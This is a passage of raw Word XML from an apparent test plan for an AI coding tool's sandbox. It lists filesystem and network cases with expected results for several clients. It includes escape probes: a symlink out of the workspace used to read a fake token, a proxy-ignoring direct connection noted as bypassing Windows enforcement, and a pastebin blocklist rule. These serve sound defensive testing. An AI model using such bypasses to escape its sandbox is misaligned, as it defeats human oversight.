              <w:t xml:space="preserve">FS-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">/add-dir</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> is not a sandbox grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/add-dir C:\SbxTest\other</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, then write there via shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Still blocked — grant via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox config</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> instead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Symlink out of workspace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">mklink /D repo\link C:\SbxTest\secrets</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, then </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type link\fake-token.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Links inside a granted dir are </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> followed to new targets 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Temp directory writes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">python -c "import tempfile; open(tempfile.mktemp(),'w').write('x')"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Managed path grant intersection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Managed R/W </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\src</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; user R/W </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">C:\src\app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ User grant </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">dropped</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (exact-string match, not parent coverage) — check </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">FS-21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WSL: reach Windows files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1711" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">From WSL session, write to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/mnt/c/Users/&lt;u&gt;/Desktop/x.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1543" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Unless granted on the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Linux</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> side</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ (paths resolved on WSL host)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1226" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Network is where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">native Windows and WSL2 differ most</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: on WSL2 the sandbox forces traffic through its proxy; on Windows it relies on programs honouring proxy variables. Run every case on both hosts.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="915"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="1535"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1107"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Default outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -I https://example.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Outbound on by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ On by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowNetwork</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> defaults true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Outbound OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowOutbound: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / app "Outbound internet" off / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">network.allowNetwork: false</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; repeat NW-01, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">npm ci</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">git fetch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ All fail; host rules + proxy become </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">inactive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Also blocks the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Integrated Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Allowlist enforced</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedHosts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = github.com, Artifactory; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">curl</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> an allowed and a non-listed host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ allowed · ⛔ other. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Windows ⚠️</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> for proxy-aware tools only; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WSL2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> enforced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔ (managed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ / ⛔ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowedDomains</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ both</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Proxy-ignoring program</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (Windows)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Run a tool that ignores </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTPS_PROXY</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (e.g. a small Node </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">net.connect</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to a non-listed host:443)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Can connect directly</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> on Windows — guardrail, not boundary. WSL2: ⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Blocklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">blockedHosts: ["pastebin.com"]</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; curl </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pastebin.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">api.pastebin.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Both — block covers subdomains, beats allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">deniedDomains</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1107" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="915" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">NW-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Wildcard semantics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1791" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Allow </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">*.example.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; curl </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">api.example.com</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">example.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1535" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
